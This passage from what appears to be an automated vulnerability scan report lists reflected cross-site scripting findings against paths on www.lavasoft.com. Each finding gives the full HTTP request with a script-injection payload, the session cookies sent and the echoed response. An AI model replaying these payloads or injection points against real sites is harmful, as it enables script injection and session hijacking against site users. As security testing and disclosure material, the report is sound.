Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18347
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modulesfaf8b'><script>alert(1)</script>aac192f3126/user/user.css'>
...[SNIP]...

1.212. http://www.lavasoft.com/mylavasoft/modules/user/user.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/user/user.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e50cb'><script>alert(1)</script>a488ec66a24 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/usere50cb'><script>alert(1)</script>a488ec66a24/user.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:41 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18309
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/usere50cb'><script>alert(1)</script>a488ec66a24/user.css'>
...[SNIP]...

1.213. http://www.lavasoft.com/mylavasoft/modules/user/user.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/user/user.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a545a'><script>alert(1)</script>d88e24eab1c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/user/user.cssa545a'><script>alert(1)</script>d88e24eab1c?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18309
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/user/user.cssa545a'><script>alert(1)</script>d88e24eab1c'>
...[SNIP]...

1.214. http://www.lavasoft.com/mylavasoft/modules/user/user.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/user/user.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 49b0c'><script>alert(1)</script>7c44f2e80ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft49b0c'><script>alert(1)</script>7c44f2e80ad/modules/user/user.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:16 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:16 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:16 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10624
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft49b0c'><script>alert(1)</script>7c44f2e80ad/modules/user/user.js?w'>
...[SNIP]...

1.215. http://www.lavasoft.com/mylavasoft/modules/user/user.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/user/user.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7b64a'><script>alert(1)</script>f62241c0c7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules7b64a'><script>alert(1)</script>f62241c0c7/user/user.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:28 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18343
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules7b64a'><script>alert(1)</script>f62241c0c7/user/user.js'>
...[SNIP]...

1.216. http://www.lavasoft.com/mylavasoft/modules/user/user.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/user/user.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 183e2'><script>alert(1)</script>bc10062b1a0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/user183e2'><script>alert(1)</script>bc10062b1a0/user.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:41 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18307
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/user183e2'><script>alert(1)</script>bc10062b1a0/user.js'>
...[SNIP]...

1.217. http://www.lavasoft.com/mylavasoft/modules/user/user.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/user/user.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b616b'><script>alert(1)</script>b774bbd66e1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/user/user.jsb616b'><script>alert(1)</script>b774bbd66e1?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:56 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18307
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/user/user.jsb616b'><script>alert(1)</script>b774bbd66e1'>
...[SNIP]...

1.218. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 58282'><script>alert(1)</script>e844c762b7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft58282'><script>alert(1)</script>e844c762b7a/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:27 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:27 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10659
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft58282'><script>alert(1)</script>e844c762b7a/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css?w'>
...[SNIP]...

1.219. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ad24f'><script>alert(1)</script>80b0e78178b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sitesad24f'><script>alert(1)</script>80b0e78178b/all/modules/cck/modules/fieldgroup/fieldgroup.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18292
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sitesad24f'><script>alert(1)</script>80b0e78178b/all/modules/cck/modules/fieldgroup/fieldgroup.css'>
...[SNIP]...

1.220. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4cf7a'><script>alert(1)</script>4971be75db1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all4cf7a'><script>alert(1)</script>4971be75db1/modules/cck/modules/fieldgroup/fieldgroup.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18254
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all4cf7a'><script>alert(1)</script>4971be75db1/modules/cck/modules/fieldgroup/fieldgroup.css'>
...[SNIP]...

1.221. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3b91e'><script>alert(1)</script>09a0fb82f54 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules3b91e'><script>alert(1)</script>09a0fb82f54/cck/modules/fieldgroup/fieldgroup.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18254
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules3b91e'><script>alert(1)</script>09a0fb82f54/cck/modules/fieldgroup/fieldgroup.css'>
...[SNIP]...

1.222. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 80300'><script>alert(1)</script>a8fa8110624 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/cck80300'><script>alert(1)</script>a8fa8110624/modules/fieldgroup/fieldgroup.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:19 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18254
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/cck80300'><script>alert(1)</script>a8fa8110624/modules/fieldgroup/fieldgroup.css'>
...[SNIP]...

1.223. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1ff16'><script>alert(1)</script>776fd51402b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/cck/modules1ff16'><script>alert(1)</script>776fd51402b/fieldgroup/fieldgroup.css?w HTTP/1.1
Host: www.lavasoft.com
